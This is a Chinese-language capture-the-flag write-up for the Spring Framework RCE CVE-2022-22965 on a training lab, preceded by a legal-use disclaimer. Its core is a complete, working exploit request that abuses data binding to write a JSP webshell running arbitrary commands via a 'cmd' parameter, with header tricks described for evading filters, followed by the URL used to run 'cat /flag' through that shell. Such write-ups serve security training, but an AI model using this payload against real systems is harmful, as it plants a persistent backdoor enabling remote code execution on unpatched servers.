春秋云镜——CVE-2022-22965

本博客所有网络安全相关教程、漏洞原理、渗透实操、攻防技术等内容,仅用于合法安全学习、白帽技术交流、企业授权安全测试。
所有技术严禁用于未授权探测、非法入侵、数据窃取、网络攻击等任何违反《中华人民共和国网络安全法》的违法行为。
任何个人利用本文内容实施违规操作,所产生的一切法律责任与后果均由当事人自行承担,与本人无关。
倡导正向网络安全学习,坚守白帽底线,共建清朗网络环境。

靶标介绍:

Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。

解题步骤

1.打开 Burp Suite

2.打开内嵌浏览器,浏览器能正常访问靶场

打开代理

抓包

3.右击发送到重发器,进入 Repeater(重发器)

4.清空里面所有内容

5.粘贴payload,将重发器内容替换到下面内容

复制代码
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: eci-2ze1oyjb5kc42eizgc85.cloudeci1.ichunqiu.com:8080
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Connection: close

往服务器里写入一个能执行命令的 JSP 木马

  1. 敏感符号不能放 URL → 藏请求头
  2. URL 用 %{xxx} 占位符 → 不触发拦截
  3. // 注释日志 → 保证木马干净可用

如下图所示,粘贴后点击发送

查看响应,看状态码是200 OK 说明成功写入

回到代理页面,关闭拦截

6.在浏览器打开下面地址

复制代码
https://eci-2ze1oyjb5kc42eizgc85.cloudeci1.ichunqiu.com:8080/shell.jsp?pwd=j&cmd=cat /flag

访问后发现有很多内容,但里面出现了flag

出现这么多乱码是因为我之前发送了很多请求,文件被多次写入造成了污染。

相关推荐
是隼人24 分钟前
buuctf-pwn bjdctf_2020_babystack2题解 整数溢出(学习过程持续更新)
c语言·学习·安全·pwn入门·ctf入门
虹科网络安全26 分钟前
KnowBe4 SAT 是什么?安全意识培训平台功能与应用详解
网络
艺杯羹1 小时前
古典密码学攻防演进全景:从凯撒移位、频率分析到一次一密与恩尼格玛机破译
网络·人工智能·安全·网络安全·密码学·密码安全
发量惊人的中年网工1 小时前
多品牌酒店门店如何集中管控网络?SD-WAN 实现住客网与业务网隔离的实践
网络·组网
菩提小狗1 小时前
每日安全情报报告 · 2026-08-17
网络安全·漏洞·cve·安全情报·每日安全
菜是原罪1 小时前
ECS CPU 100% 故障排查与安全事件复盘报告
运维·服务器·网络安全
MartinYeung51 小时前
Aztec Connect 黑客攻击深度剖析:结算边界绕过漏洞
安全·区块链
MartinYeung51 小时前
[论文学习]Latent Fusion Jailbreak: 融合有害与无害表征以诱导大语言模型产生不安全输出
学习·安全·语言模型
飞飞传输2 小时前
机器人行业数据流转深度研究:内外网数据摆渡平台应用现状与趋势
大数据·运维·安全
juesdo2 小时前
vulnos OS-00118靶场通关
linux·web安全·网络安全·docker